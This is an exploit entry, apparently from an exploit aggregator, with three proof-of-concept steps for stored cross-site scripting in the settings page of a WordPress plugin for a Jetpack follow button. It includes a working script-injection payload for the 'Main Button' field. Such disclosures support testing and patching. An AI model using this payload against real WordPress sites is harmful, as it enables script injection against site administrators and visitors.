## https://sploitus.com/exploit?id=WPEX-ID:715DED45-04EE-40C1-8ACB-BD40D0FE30EC
1. Navigate to: https://example.com/wp-admin/admin.php?page=better-follow-button-for-jetpack%2Fsettings.php
2. Add the payload to the "Main Button" field (other fields are likely vulnerable as well): "><script>alert(1)</script>
3. Click "Save Changes" and see the XSS.